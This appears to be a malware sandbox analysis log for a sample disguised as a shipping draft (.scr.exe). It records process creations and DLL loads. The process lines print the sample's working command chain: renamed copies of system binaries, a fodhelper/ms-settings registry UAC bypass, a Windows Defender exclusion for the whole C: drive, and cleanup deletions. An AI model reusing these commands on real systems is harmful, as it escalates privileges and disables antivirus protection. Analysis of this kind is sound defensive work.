Source: unknown	Process created: C:\Users\Public\Libraries\Glzskrlg.PIF "C:\Users\Public\Libraries\Glzskrlg.PIF"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\\Users\\Public\\Libraries\\Glzskrlg.PIF	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: archiveint.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
